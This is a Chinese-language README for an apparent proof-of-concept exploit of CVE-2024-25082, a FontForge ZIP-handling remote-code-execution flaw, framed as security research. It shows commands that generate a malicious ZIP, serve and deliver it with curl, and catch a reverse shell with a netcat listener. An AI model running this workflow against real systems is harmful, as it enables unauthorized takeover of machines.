CVE-2024-25082 的概念验证漏洞利用程序,该漏洞影响 FontForge,允许通过特制的 ZIP 压缩包实现远程代码执行 (RCE)。
本仓库演示了如何在受控的实验环境中利用该漏洞,用于安全研究和教育目的。
该漏洞源于对 ZIP 压缩包内文件验证不当,使攻击者能够在目标系统上执行任意命令。
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│ └── exploit.zip
├── writeup.md
└── License
文件 描述
exploit.py 生成恶意 ZIP 载荷 poc/ 包含生成的概念验证文件 writeup.md 漏洞的技术说明
安装可选工具:
sudo apt install netcat
python3 exploit.py --lhost <Your IP> --lport <Your Port>
这将生成一个恶意的 exploit.zip 文件。
python3 -m http.server 8080
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip
nc -lvnp <Your Port>
如果成功,将会从目标系统获得一个 Shell。
docker/ 目录中提供了一个可复现的漏洞环境。
示例:
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln
这样可以安全地进行测试,而不会影响生产系统。
能够上传或控制受漏洞影响应用程序所处理 ZIP 文件的攻击者可能:
建议的缓解措施:
本仓库包含针对已公开漏洞的概念验证代码。
该代码严格仅供以下用途:
未经明确许可,请勿将此代码用于任何系统。
作者对因使用本软件而造成的滥用或损害不承担任何责任。
Moamen Elmaghrabi
网络安全专业学生
渗透测试与漏洞利用开发
本项目基于 MIT 许可证授权。
有关详细信息,请参阅 LICENSE 文件。